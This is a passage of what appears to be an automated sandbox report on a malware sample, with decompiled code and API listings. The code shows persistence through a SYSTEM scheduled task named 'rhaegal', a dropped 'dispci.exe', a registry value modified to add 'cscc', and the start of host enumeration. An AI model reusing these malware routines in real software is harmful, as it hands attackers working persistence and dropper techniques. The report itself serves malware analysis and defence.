                                                                                                                                                              				if(GetEnvironmentVariableW(L"ComSpec",  &_v1648, 0x30c) != 0 || GetSystemDirectoryW( &_v1648, 0x30c) != 0 && lstrcatW( &_v1648, L"\\cmd.exe") != 0) {
                                                                                                                                                              					_t35 = 0x10;
                                                                                                                                                              					_t20 =  &_v20;
                                                                                                                                                              					do {
                                                                                                                                                              						 *_t20 = 0;
                                                                                                                                                              						_t20 = _t20 + 1;
                                                                                                                                                              						_t35 = _t35 - 1;
                                                                                                                                                              					} while (_t35 != 0);
                                                                                                                                                              					_t36 = 0x44;
                                                                                                                                                              					_t37 = _t36;
                                                                                                                                                              					_t21 =  &_v88;
                                                                                                                                                              					do {
                                                                                                                                                              						 *_t21 = 0;
                                                                                                                                                              						_t21 = _t21 + 1;
                                                                                                                                                              						_t37 = _t37 - 1;
                                                                                                                                                              					} while (_t37 != 0);
                                                                                                                                                              					_v88.cb = _t36;
                                                                                                                                                              					_t26 = CreateProcessW( &_v1648,  &_v3696, 0, 0, 0, 0x8000000, 0, 0,  &_v88,  &_v20); // executed
                                                                                                                                                              					_t38 = _t26;
                                                                                                                                                              					if(_t38 != 0) {
                                                                                                                                                              						Sleep(_a8 * 0x3e8); // executed
                                                                                                                                                              					}
                                                                                                                                                              					goto L9;
                                                                                                                                                              				} else {
                                                                                                                                                              					L9:
                                                                                                                                                              					return _t38;
                                                                                                                                                              				}
                                                                                                                                                              			}















                                                                                                                                                              0x04e27fd4
                                                                                                                                                              0x04e27fd6
                                                                                                                                                              0x04e27fe1
                                                                                                                                                              0x04e28002
                                                                                                                                                              0x04e2802e
                                                                                                                                                              0x04e2802f
                                                                                                                                                              0x04e28032
                                                                                                                                                              0x04e28032
                                                                                                                                                              0x04e28034
                                                                                                                                                              0x04e28035
                                                                                                                                                              0x04e28035
                                                                                                                                                              0x04e2803a
                                                                                                                                                              0x04e2803b
                                                                                                                                                              0x04e2803d
                                                                                                                                                              0x04e28040
                                                                                                                                                              0x04e28040
                                                                                                                                                              0x04e28042
                                                                                                                                                              0x04e28043
                                                                                                                                                              0x04e28043
                                                                                                                                                              0x04e28066
                                                                                                                                                              0x04e28069
                                                                                                                                                              0x04e2806f
                                                                                                                                                              0x04e28073
                                                                                                                                                              0x04e2807f
                                                                                                                                                              0x04e2807f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e28085
                                                                                                                                                              0x04e28085
                                                                                                                                                              0x04e2808b
                                                                                                                                                              0x04e2808b

                                                                                                                                                              APIs
                                                                                                                                                              • wsprintfW.USER32 ref: 04E27FD6
                                                                                                                                                              • GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C), ref: 04E27FFA
                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 04E2800C
                                                                                                                                                              • lstrcatW.KERNEL32(?,\cmd.exe), ref: 04E28022
                                                                                                                                                              • CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 04E28069
                                                                                                                                                              • Sleep.KERNELBASE(00000000), ref: 04E2807F
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateDirectoryEnvironmentProcessSleepSystemVariablelstrcatwsprintf
                                                                                                                                                              • String ID: /c %ws$ComSpec$\cmd.exe
                                                                                                                                                              • API String ID: 1518394870-1564754240
                                                                                                                                                              • Opcode ID: 180f9ce6d7344857d8260c55e1166109c223cb1f8007abf9a9191d99dfb77315
                                                                                                                                                              • Instruction ID: 6c1ea04f0b5c73854e0544996387877dad80cf8973c2156b0172247b5dd06799
                                                                                                                                                              • Opcode Fuzzy Hash: 180f9ce6d7344857d8260c55e1166109c223cb1f8007abf9a9191d99dfb77315
                                                                                                                                                              • Instruction Fuzzy Hash: EC21D77260011CAFEB21DBA5DE88EEF77ADEB94346F004566F505E6140EA76DE48CB30
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E04E21000(void* __eflags, intOrPtr _a4) {
                                                                                                                                                              				short _v524;
                                                                                                                                                              				short _v1564;
                                                                                                                                                              				void* _t8;
                                                                                                                                                              				signed int _t15;
                                                                                                                                                              				signed int _t21;
                                                                                                                                                              
                                                                                                                                                              				_t21 = 0;
                                                                                                                                                              				_t8 = E04E27FB7(L"schtasks /Delete /F /TN rhaegal", 0); // executed
                                                                                                                                                              				if(_t8 != 0) {
                                                                                                                                                              					Sleep(0x7d0); // executed
                                                                                                                                                              				}
                                                                                                                                                              				if(GetEnvironmentVariableW(L"ComSpec",  &_v524, 0x104) != 0 || GetSystemDirectoryW( &_v524, 0x104) != 0 && lstrcatW( &_v524, L"\\cmd.exe") != 0) {
                                                                                                                                                              					wsprintfW( &_v1564, L"schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR \"%ws /C Start \\\"\\\" \\\"%wsdispci.exe\\\" -id %u && exit\"",  &_v524, _a4,  *0x4e37bbc);
                                                                                                                                                              					_t15 = E04E27FB7( &_v1564, _t21); // executed
                                                                                                                                                              					_t21 = _t15;
                                                                                                                                                              				}
                                                                                                                                                              				return _t21;
                                                                                                                                                              			}








                                                                                                                                                              0x04e2100b
                                                                                                                                                              0x04e21013
                                                                                                                                                              0x04e2101a
                                                                                                                                                              0x04e21021
                                                                                                                                                              0x04e21021
                                                                                                                                                              0x04e21041
                                                                                                                                                              0x04e21087
                                                                                                                                                              0x04e21098
                                                                                                                                                              0x04e2109d
                                                                                                                                                              0x04e2109d
                                                                                                                                                              0x04e210a4

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 04E27FB7: wsprintfW.USER32 ref: 04E27FD6
                                                                                                                                                                • Part of subcall function 04E27FB7: GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C), ref: 04E27FFA
                                                                                                                                                                • Part of subcall function 04E27FB7: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 04E2800C
                                                                                                                                                                • Part of subcall function 04E27FB7: lstrcatW.KERNEL32(?,\cmd.exe), ref: 04E28022
                                                                                                                                                                • Part of subcall function 04E27FB7: CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 04E28069
                                                                                                                                                                • Part of subcall function 04E27FB7: Sleep.KERNELBASE(00000000), ref: 04E2807F
                                                                                                                                                              • Sleep.KERNELBASE(000007D0,schtasks /Delete /F /TN rhaegal,00000000,?,00000000), ref: 04E21021
                                                                                                                                                              • GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,schtasks /Delete /F /TN rhaegal,00000000,?,00000000), ref: 04E21039
                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 04E2104B
                                                                                                                                                              • lstrcatW.KERNEL32(?,\cmd.exe), ref: 04E21061
                                                                                                                                                              • wsprintfW.USER32 ref: 04E21087
                                                                                                                                                              Strings
                                                                                                                                                              • schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "%ws /C Start \"\" \"%wsdispci.exe\" -id %u && exit", xrefs: 04E21081
                                                                                                                                                              • \cmd.exe, xrefs: 04E21055
                                                                                                                                                              • ComSpec, xrefs: 04E21034
                                                                                                                                                              • schtasks /Delete /F /TN rhaegal, xrefs: 04E2100E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DirectoryEnvironmentSleepSystemVariablelstrcatwsprintf$CreateProcess
                                                                                                                                                              • String ID: ComSpec$\cmd.exe$schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "%ws /C Start \"\" \"%wsdispci.exe\" -id %u && exit"$schtasks /Delete /F /TN rhaegal
                                                                                                                                                              • API String ID: 2538701606-2521368254
                                                                                                                                                              • Opcode ID: 8e396855de15580d5235c3f6ab583a4bef19e62f5a8dff3f2cadbf77c56913b0
                                                                                                                                                              • Instruction ID: 4debdc1c35116ce61faa31640e9fef8f8c27523ad344bebbad9d9e0ecc5984ce
                                                                                                                                                              • Opcode Fuzzy Hash: 8e396855de15580d5235c3f6ab583a4bef19e62f5a8dff3f2cadbf77c56913b0
                                                                                                                                                              • Instruction Fuzzy Hash: 8201B9766002286BEB709B729E0CED77BBDEF84706F001061BA05E2109DA35EA44CF70
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 96%
                                                                                                                                                              			E04E211EF(int _a4, short* _a8) {
                                                                                                                                                              				long _v8;
                                                                                                                                                              				void* _v12;
                                                                                                                                                              				int _v16;
                                                                                                                                                              				char _v2064;
                                                                                                                                                              				long _t42;
                                                                                                                                                              				intOrPtr* _t43;
                                                                                                                                                              				long _t49;
                                                                                                                                                              				long _t60;
                                                                                                                                                              				char* _t62;
                                                                                                                                                              				char* _t63;
                                                                                                                                                              				int _t68;
                                                                                                                                                              				intOrPtr _t70;
                                                                                                                                                              				intOrPtr* _t71;
                                                                                                                                                              				char _t72;
                                                                                                                                                              				int _t73;
                                                                                                                                                              				void* _t74;
                                                                                                                                                              				char _t75;
                                                                                                                                                              				char* _t76;
                                                                                                                                                              				char _t77;
                                                                                                                                                              				char* _t79;
                                                                                                                                                              				void* _t81;
                                                                                                                                                              
                                                                                                                                                              				_t42 = RegOpenKeyW(0x80000002, _a4,  &_v12); // executed
                                                                                                                                                              				if(_t42 != 0) {
                                                                                                                                                              					return _t42;
                                                                                                                                                              				}
                                                                                                                                                              				_t43 = L"cscc";
                                                                                                                                                              				_t74 = _t43 + 2;
                                                                                                                                                              				do {
                                                                                                                                                              					_t70 =  *_t43;
                                                                                                                                                              					_t43 = _t43 + 2;
                                                                                                                                                              				} while (_t70 != 0);
                                                                                                                                                              				_t68 = (_t43 - _t74 >> 1) + (_t43 - _t74 >> 1) + 2;
                                                                                                                                                              				_t79 =  &_v2064;
                                                                                                                                                              				_a4 = 0x800;
                                                                                                                                                              				_t49 = RegQueryValueExW(_v12, _a8, 0,  &_v16, _t79,  &_a4); // executed
                                                                                                                                                              				_v8 = _t49;
                                                                                                                                                              				if(_t49 == 0) {
                                                                                                                                                              					if(_v16 != 7 || _a4 + _t68 > 0x800) {
                                                                                                                                                              						_v8 = 0x65d;
                                                                                                                                                              						goto L23;
                                                                                                                                                              					} else {
                                                                                                                                                              						if(_v2064 == 0) {
                                                                                                                                                              							L20:
                                                                                                                                                              							memmove(_t81 + _t68 - 0x80c,  &_v2064, _a4);
                                                                                                                                                              							memcpy( &_v2064, L"cscc", _t68);
                                                                                                                                                              							_a4 = _a4 + _t68;
                                                                                                                                                              							_t60 = RegSetValueExW(_v12, _a8, 0, 7,  &_v2064, _a4); // executed
                                                                                                                                                              							_v8 = _t60;
                                                                                                                                                              							if(_t60 == 0) {
                                                                                                                                                              								_v8 = RegFlushKey(_v12);
                                                                                                                                                              							}
                                                                                                                                                              							L23:
                                                                                                                                                              							RegCloseKey(_v12); // executed
                                                                                                                                                              							return _v8;
                                                                                                                                                              						} else {
                                                                                                                                                              							goto L9;
                                                                                                                                                              						}
                                                                                                                                                              						do {
                                                                                                                                                              							L9:
                                                                                                                                                              							_t71 = L"cscc";
                                                                                                                                                              							_t62 = _t79;
                                                                                                                                                              							while(1) {
                                                                                                                                                              								_t75 =  *_t62;
                                                                                                                                                              								if(_t75 !=  *_t71) {
                                                                                                                                                              									break;
                                                                                                                                                              								}
                                                                                                                                                              								if(_t75 == 0) {
                                                                                                                                                              									L14:
                                                                                                                                                              									_t62 = 0;
                                                                                                                                                              									L16:
                                                                                                                                                              									if(_t62 == 0) {
                                                                                                                                                              										goto L23;
                                                                                                                                                              									}
                                                                                                                                                              									_t63 = _t79;
                                                                                                                                                              									_t76 =  &(_t63[2]);
                                                                                                                                                              									do {
                                                                                                                                                              										_t72 =  *_t63;
                                                                                                                                                              										_t63 =  &(_t63[2]);
                                                                                                                                                              									} while (_t72 != 0);
                                                                                                                                                              									goto L19;
                                                                                                                                                              								}
                                                                                                                                                              								_t77 = _t62[2];
                                                                                                                                                              								if(_t77 !=  *((intOrPtr*)(_t71 + 2))) {
                                                                                                                                                              									break;
                                                                                                                                                              								}
                                                                                                                                                              								_t62 =  &(_t62[4]);
                                                                                                                                                              								_t71 = _t71 + 4;
                                                                                                                                                              								if(_t77 != 0) {
                                                                                                                                                              									continue;
                                                                                                                                                              								}
                                                                                                                                                              								goto L14;
                                                                                                                                                              							}
                                                                                                                                                              							asm("sbb eax, eax");
                                                                                                                                                              							asm("sbb eax, 0xffffffff");
                                                                                                                                                              							goto L16;
                                                                                                                                                              							L19:
                                                                                                                                                              							_t79 =  &(_t79[2 + (_t63 - _t76 >> 1) * 2]);
                                                                                                                                                              						} while ( *_t79 != _t72);
                                                                                                                                                              						goto L20;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				_t73 = 2;
                                                                                                                                                              				if(_t49 != _t73) {
                                                                                                                                                              					goto L23;
                                                                                                                                                              				}
                                                                                                                                                              				_v2064 = 0;
                                                                                                                                                              				_a4 = _t73;
                                                                                                                                                              				goto L20;
                                                                                                                                                              			}
























                                                                                                                                                              0x04e21204
                                                                                                                                                              0x04e2120c
                                                                                                                                                              0x04e21365
                                                                                                                                                              0x04e21365
                                                                                                                                                              0x04e21212
                                                                                                                                                              0x04e21217
                                                                                                                                                              0x04e2121a
                                                                                                                                                              0x04e2121a
                                                                                                                                                              0x04e2121d
                                                                                                                                                              0x04e21220
                                                                                                                                                              0x04e2122b
                                                                                                                                                              0x04e21233
                                                                                                                                                              0x04e21245
                                                                                                                                                              0x04e2124f
                                                                                                                                                              0x04e21255
                                                                                                                                                              0x04e2125a
                                                                                                                                                              0x04e21279
                                                                                                                                                              0x04e2134f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e2128f
                                                                                                                                                              0x04e21297
                                                                                                                                                              0x04e212f0
                                                                                                                                                              0x04e21302
                                                                                                                                                              0x04e21315
                                                                                                                                                              0x04e2131a
                                                                                                                                                              0x04e21334
                                                                                                                                                              0x04e2133a
                                                                                                                                                              0x04e2133f
                                                                                                                                                              0x04e2134a
                                                                                                                                                              0x04e2134a
                                                                                                                                                              0x04e21356
                                                                                                                                                              0x04e21359
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e21299
                                                                                                                                                              0x04e21299
                                                                                                                                                              0x04e21299
                                                                                                                                                              0x04e2129e
                                                                                                                                                              0x04e212a0
                                                                                                                                                              0x04e212a0
                                                                                                                                                              0x04e212a6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e212ab
                                                                                                                                                              0x04e212c2
                                                                                                                                                              0x04e212c2
                                                                                                                                                              0x04e212cb
                                                                                                                                                              0x04e212cd
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e212d3
                                                                                                                                                              0x04e212d5
                                                                                                                                                              0x04e212d8
                                                                                                                                                              0x04e212d8
                                                                                                                                                              0x04e212db
                                                                                                                                                              0x04e212de
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e212d8
                                                                                                                                                              0x04e212ad
                                                                                                                                                              0x04e212b5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e212b7
                                                                                                                                                              0x04e212ba
                                                                                                                                                              0x04e212c0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e212c0
                                                                                                                                                              0x04e212c6
                                                                                                                                                              0x04e212c8
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e212e3
                                                                                                                                                              0x04e212e7
                                                                                                                                                              0x04e212eb
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e21299
                                                                                                                                                              0x04e21279
                                                                                                                                                              0x04e2125e
                                                                                                                                                              0x04e21261
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e21269
                                                                                                                                                              0x04e21270
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • RegOpenKeyW.ADVAPI32(80000002,?,?), ref: 04E21204
                                                                                                                                                              • RegQueryValueExW.KERNELBASE(00000800,?,00000000,?,?,?,00000000,?), ref: 04E2124F
                                                                                                                                                              • memmove.MSVCRT ref: 04E21302
                                                                                                                                                              • memcpy.MSVCRT ref: 04E21315
                                                                                                                                                              • RegSetValueExW.KERNELBASE(00000800,00000007,00000000,00000007,?,00000800), ref: 04E21334
                                                                                                                                                              • RegFlushKey.ADVAPI32(00000800), ref: 04E21344
                                                                                                                                                              • RegCloseKey.KERNELBASE(00000800), ref: 04E21359
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Value$CloseFlushOpenQuerymemcpymemmove
                                                                                                                                                              • String ID: cscc
                                                                                                                                                              • API String ID: 3731182797-3289078142
                                                                                                                                                              • Opcode ID: 6a99a071a62d96b18c7f87e1aaee28cf9e72fedde9d4db005c403b90fd6c5bd3
                                                                                                                                                              • Instruction ID: 1db52311bba9c92c60093f965d636a724e9dbb2085a4020f58796cf520c79426
                                                                                                                                                              • Opcode Fuzzy Hash: 6a99a071a62d96b18c7f87e1aaee28cf9e72fedde9d4db005c403b90fd6c5bd3
                                                                                                                                                              • Instruction Fuzzy Hash: 03419C72900129EBDF209F64CE05FEABBBAFB14749F048165F945E6150E731EB44DB90
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 79%
                                                                                                                                                              			E04E210A7() {
                                                                                                                                                              				void* _v8;
                                                                                                                                                              				char _v12;
                                                                                                                                                              				short _v532;
                                                                                                                                                              				short _v1052;
                                                                                                                                                              				void* __ebx;
                                                                                                                                                              				signed int _t37;
                                                                                                                                                              				void* _t38;
                                                                                                                                                              				signed int _t41;
                                                                                                                                                              				void* _t42;
                                                                                                                                                              				void* _t43;
                                                                                                                                                              				void* _t49;
                                                                                                                                                              				intOrPtr* _t55;
                                                                                                                                                              				void* _t58;
                                                                                                                                                              				intOrPtr* _t59;
                                                                                                                                                              				signed char _t62;
                                                                                                                                                              				signed int _t64;
                                                                                                                                                              				signed int _t65;
                                                                                                                                                              				signed int _t66;
                                                                                                                                                              				intOrPtr _t67;
                                                                                                                                                              				intOrPtr _t69;
                                                                                                                                                              				short _t70;
                                                                                                                                                              				void* _t71;
                                                                                                                                                              				void* _t72;
                                                                                                                                                              				short _t73;
                                                                                                                                                              				void* _t75;
                                                                                                                                                              
                                                                                                                                                              				_t62 = 2;
                                                                                                                                                              				_t73 = 0;
                                                                                                                                                              				if(( *0x4e37bc0 & _t62) == 0) {
                                                                                                                                                              					L20:
                                                                                                                                                              					return _t73;
                                                                                                                                                              				}
                                                                                                                                                              				if(( *0x4e37b7c & 0x00000040) != 0) {
                                                                                                                                                              					_t37 = 0;
                                                                                                                                                              					__eflags = 0;
                                                                                                                                                              					do {
                                                                                                                                                              						_t17 = _t37 + L"C:\\Windows\\"; // 0x3a0043
                                                                                                                                                              						_t64 =  *_t17 & 0x0000ffff;
                                                                                                                                                              						 *(_t75 + _t37 - 0x210) = _t64;
                                                                                                                                                              						_t37 = _t37 + _t62;
                                                                                                                                                              						__eflags = _t64;
                                                                                                                                                              					} while (_t64 != 0);
                                                                                                                                                              				} else {
                                                                                                                                                              					ExpandEnvironmentStringsW(L"%ALLUSERSPROFILE%",  &_v532, 0x104);
                                                                                                                                                              					_t55 =  &_v532;
                                                                                                                                                              					_t71 = _t55 + 2;
                                                                                                                                                              					do {
                                                                                                                                                              						_t67 =  *_t55;
                                                                                                                                                              						_t55 = _t55 + _t62;
                                                                                                                                                              					} while (_t67 != 0);
                                                                                                                                                              					_t58 = (_t55 - _t71 >> 1) + (_t55 - _t71 >> 1);
                                                                                                                                                              					if( *((short*)(_t75 + _t58 - 0x212)) == 0x5c) {
                                                                                                                                                              						L10:
                                                                                                                                                              						_t38 = 0;
                                                                                                                                                              						do {
                                                                                                                                                              							_t65 =  *(_t75 + _t38 - 0x210) & 0x0000ffff;
                                                                                                                                                              							 *(_t75 + _t38 - 0x418) = _t65;
                                                                                                                                                              							_t38 = _t38 + _t62;
                                                                                                                                                              						} while (_t65 != 0);
                                                                                                                                                              						_push( &_v12);
                                                                                                                                                              						_push( &_v8);
                                                                                                                                                              						_t41 = 9; // executed
                                                                                                                                                              						_t42 = E04E28313(_t41); // executed
                                                                                                                                                              						if(_t42 == 0) {
                                                                                                                                                              							goto L20;
                                                                                                                                                              						}
                                                                                                                                                              						_t43 = 0;
                                                                                                                                                              						do {
                                                                                                                                                              							_t66 =  *(_t75 + _t43 - 0x210) & 0x0000ffff;
                                                                                                                                                              							 *(_t75 + _t43 - 0x418) = _t66;
                                                                                                                                                              							_t43 = _t43 + _t62;
                                                                                                                                                              						} while (_t66 != 0);
                                                                                                                                                              						if(PathAppendW( &_v1052, L"dispci.exe") != 0) {
                                                                                                                                                              							_t49 = E04E287E7(_v12,  &_v1052, _v8); // executed
                                                                                                                                                              							_t88 = _t49;
                                                                                                                                                              							if(_t49 != 0) {
                                                                                                                                                              								E04E21000(_t88,  &_v532); // executed
                                                                                                                                                              								if(E04E21531() == 0) {
                                                                                                                                                              									_t73 = 1;
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						RtlFreeHeap(GetProcessHeap(), 0, _v8); // executed
                                                                                                                                                              						goto L20;
                                                                                                                                                              					}
                                                                                                                                                              					 *((short*)(_t75 + _t58 - 0x20e)) = 0;
                                                                                                                                                              					_t59 =  &_v532;
                                                                                                                                                              					_t72 = _t59 + 2;
                                                                                                                                                              					do {
                                                                                                                                                              						_t69 =  *_t59;
                                                                                                                                                              						_t59 = _t59 + _t62;
                                                                                                                                                              					} while (_t69 != 0);
                                                                                                                                                              					_t70 = 0x5c;
                                                                                                                                                              					 *((short*)(_t75 + (_t59 - _t72 >> 1) * 2 - 0x210)) = _t70;
                                                                                                                                                              				}
                                                                                                                                                              			}




























                                                                                                                                                              0x04e210b4
                                                                                                                                                              0x04e210b5
                                                                                                                                                              0x04e210bd
                                                                                                                                                              0x04e211e9
                                                                                                                                                              0x04e211ee
                                                                                                                                                              0x04e211ee
                                                                                                                                                              0x04e210ca
                                                                                                                                                              0x04e21135
                                                                                                                                                              0x04e21135
                                                                                                                                                              0x04e21137
                                                                                                                                                              0x04e21137
                                                                                                                                                              0x04e21137
                                                                                                                                                              0x04e2113e
                                                                                                                                                              0x04e21146
                                                                                                                                                              0x04e21148
                                                                                                                                                              0x04e21148
                                                                                                                                                              0x04e210cc
                                                                                                                                                              0x04e210dd
                                                                                                                                                              0x04e210e3
                                                                                                                                                              0x04e210e9
                                                                                                                                                              0x04e210ec
                                                                                                                                                              0x04e210ec
                                                                                                                                                              0x04e210ef
                                                                                                                                                              0x04e210f1
                                                                                                                                                              0x04e210fa
                                                                                                                                                              0x04e21105
                                                                                                                                                              0x04e2114d
                                                                                                                                                              0x04e2114d
                                                                                                                                                              0x04e2114f
                                                                                                                                                              0x04e2114f
                                                                                                                                                              0x04e21157
                                                                                                                                                              0x04e2115f
                                                                                                                                                              0x04e21161
                                                                                                                                                              0x04e21169
                                                                                                                                                              0x04e2116d
                                                                                                                                                              0x04e21170
                                                                                                                                                              0x04e21171
                                                                                                                                                              0x04e21178
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e2117a
                                                                                                                                                              0x04e2117c
                                                                                                                                                              0x04e2117c
                                                                                                                                                              0x04e21184
                                                                                                                                                              0x04e2118c
                                                                                                                                                              0x04e2118e
                                                                                                                                                              0x04e211a7
                                                                                                                                                              0x04e211b6
                                                                                                                                                              0x04e211bb
                                                                                                                                                              0x04e211bd
                                                                                                                                                              0x04e211c6
                                                                                                                                                              0x04e211d2
                                                                                                                                                              0x04e211d6
                                                                                                                                                              0x04e211d6
                                                                                                                                                              0x04e211d2
                                                                                                                                                              0x04e211bd
                                                                                                                                                              0x04e211e3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e211e3
                                                                                                                                                              0x04e21109
                                                                                                                                                              0x04e21111
                                                                                                                                                              0x04e21117
                                                                                                                                                              0x04e2111a
                                                                                                                                                              0x04e2111a
                                                                                                                                                              0x04e2111d
                                                                                                                                                              0x04e2111f
                                                                                                                                                              0x04e2112a
                                                                                                                                                              0x04e2112b
                                                                                                                                                              0x04e2112b

                                                                                                                                                              APIs
                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%,?,00000104), ref: 04E210DD
                                                                                                                                                              • PathAppendW.SHLWAPI(?,dispci.exe,?,?), ref: 04E2119F
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 04E211DC
                                                                                                                                                              • RtlFreeHeap.NTDLL(00000000), ref: 04E211E3
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$AppendEnvironmentExpandFreePathProcessStrings
                                                                                                                                                              • String ID: Oet Uet0Xet$%ALLUSERSPROFILE%$\$dispci.exe
                                                                                                                                                              • API String ID: 1077166327-2496986081
                                                                                                                                                              • Opcode ID: 33352869f366479b567bc97a0c413c2fecb2c4fd7b248d8a229821322ab2f6a5
                                                                                                                                                              • Instruction ID: e5ad4dc46890b4155d5dece194d3b46b8131d4a91efcaf896d22d94ad28cd0f1
                                                                                                                                                              • Opcode Fuzzy Hash: 33352869f366479b567bc97a0c413c2fecb2c4fd7b248d8a229821322ab2f6a5
                                                                                                                                                              • Instruction Fuzzy Hash: 1331E93154022E9ADF10AFE99E89FE6B3B8FF04749F1459B4EA05D3181F774AB848B50
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 83%
                                                                                                                                                              			E04E277D1() {
                                                                                                                                                              				char _v8;
                                                                                                                                                              				char _v528;
                                                                                                                                                              				char* _t12;
                                                                                                                                                              				void* _t13;
                                                                                                                                                              				void* _t21;
                                                                                                                                                              				void* _t24;
                                                                                                                                                              
                                                                                                                                                              				_t21 =  *0x4e37bb8;
                                                                                                                                                              				E04E26B95(L"127.0.0.1", 1);
                                                                                                                                                              				E04E26B95(L"localhost", 1, _t21); // executed
                                                                                                                                                              				E04E26B95(L"0.0.0.0", 1, _t21);
                                                                                                                                                              				_t12 =  &_v528;
                                                                                                                                                              				_v8 = 0x104;
                                                                                                                                                              				__imp__GetComputerNameExW(4, _t12,  &_v8);
